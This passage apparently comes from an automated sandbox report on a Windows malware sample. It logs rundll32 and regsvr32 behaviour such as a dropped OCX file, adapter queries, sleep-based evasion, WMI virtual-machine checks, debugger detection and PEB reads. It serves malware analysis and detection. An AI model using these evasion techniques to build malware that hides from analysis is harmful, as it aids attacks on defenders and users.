Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to query network adapater information

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetAdaptersInfo,	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetAdaptersInfo,	18_2_7EDBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetAdaptersInfo,	34_2_7EEBB430

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\rundll32.exe

Dropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.ocx

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.5 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.5 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 5.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8164	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8164	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172	Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172	Thread sleep time: -130000s >= -30000s

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_7F3AAF80 GetSystemInfo,

14_2_7F3AAF80

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 130000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 130000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 130000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 130000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 130000
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 130000

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_7F3E6967 IsDebuggerPresent,OutputDebugStringW,

14_2_7F3E6967

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AAF80 mov edx, dword ptr fs:[00000030h]	14_2_7F3AAF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B0DD0 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B0DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AE860 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AE860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3728BF mov edx, dword ptr fs:[00000030h]	14_2_7F3728BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov eax, dword ptr fs:[00000030h]	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov edx, dword ptr fs:[00000030h]	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov eax, dword ptr fs:[00000030h]	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F396330 mov ecx, dword ptr fs:[00000030h]	14_2_7F396330
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AE390 mov edx, dword ptr fs:[00000030h]	14_2_7F3AE390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3E7E46 mov eax, dword ptr fs:[00000030h]	14_2_7F3E7E46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3E7EBB mov eax, dword ptr fs:[00000030h]	14_2_7F3E7EBB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F356D10 mov eax, dword ptr fs:[00000030h]	14_2_7F356D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F377DB0 mov eax, dword ptr fs:[00000030h]	14_2_7F377DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F356DAA mov eax, dword ptr fs:[00000030h]	14_2_7F356DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F37BC30 mov edx, dword ptr fs:[00000030h]	14_2_7F37BC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F37BC30 mov eax, dword ptr fs:[00000030h]	14_2_7F37BC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3A9C60 mov eax, dword ptr fs:[00000030h]	14_2_7F3A9C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F356B00 mov edx, dword ptr fs:[00000030h]	14_2_7F356B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F394B90 mov ecx, dword ptr fs:[00000030h]	14_2_7F394B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F376B80 mov edx, dword ptr fs:[00000030h]	14_2_7F376B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F377A60 mov edx, dword ptr fs:[00000030h]	14_2_7F377A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3CFA90 mov eax, dword ptr fs:[00000030h]	14_2_7F3CFA90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F373992 mov edx, dword ptr fs:[00000030h]	14_2_7F373992
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3848E0 mov ecx, dword ptr fs:[00000030h]	14_2_7F3848E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AA730 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AA730 mov eax, dword ptr fs:[00000030h]	14_2_7F3AA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AA730 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F369790 mov edx, dword ptr fs:[00000030h]	14_2_7F369790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F369790 mov ecx, dword ptr fs:[00000030h]	14_2_7F369790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F369790 mov ecx, dword ptr fs:[00000030h]	14_2_7F369790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354664 mov ecx, dword ptr fs:[00000030h]	14_2_7F354664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354664 mov ecx, dword ptr fs:[00000030h]	14_2_7F354664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354664 mov edx, dword ptr fs:[00000030h]	14_2_7F354664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AE570 mov eax, dword ptr fs:[00000030h]	14_2_7F3AE570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F37757D mov eax, dword ptr fs:[00000030h]	14_2_7F37757D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov eax, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov edx, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov eax, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AC340 mov eax, dword ptr fs:[00000030h]	14_2_7F3AC340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AE380 mov eax, dword ptr fs:[00000030h]	14_2_7F3AE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F37C230 mov eax, dword ptr fs:[00000030h]	14_2_7F37C230
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB130 mov eax, dword ptr fs:[00000030h]	14_2_7F3AB130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov edx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov edx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354174 mov edx, dword ptr fs:[00000030h]	14_2_7F354174
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354174 mov ecx, dword ptr fs:[00000030h]	14_2_7F354174
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F357160 mov edx, dword ptr fs:[00000030h]	14_2_7F357160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov ecx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov eax, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBAF80 mov edx, dword ptr fs:[00000030h]	18_2_7EDBAF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBE860 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBE860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED83972 mov edx, dword ptr fs:[00000030h]	18_2_7ED83972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov eax, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov edx, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov eax, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBE390 mov edx, dword ptr fs:[00000030h]	18_2_7EDBE390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA6330 mov ecx, dword ptr fs:[00000030h]	18_2_7EDA6330
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED86ED0 mov edx, dword ptr fs:[00000030h]	18_2_7ED86ED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF7E8A mov eax, dword ptr fs:[00000030h]	18_2_7EDF7E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF7EBB mov eax, dword ptr fs:[00000030h]	18_2_7EDF7EBB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF7E46 mov eax, dword ptr fs:[00000030h]	18_2_7EDF7E46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov edx, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov edx, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC7F60 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC7F60 mov edx, dword ptr fs:[00000030h]	18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC7F60 mov eax, dword ptr fs:[00000030h]	18_2_7EDC7F60
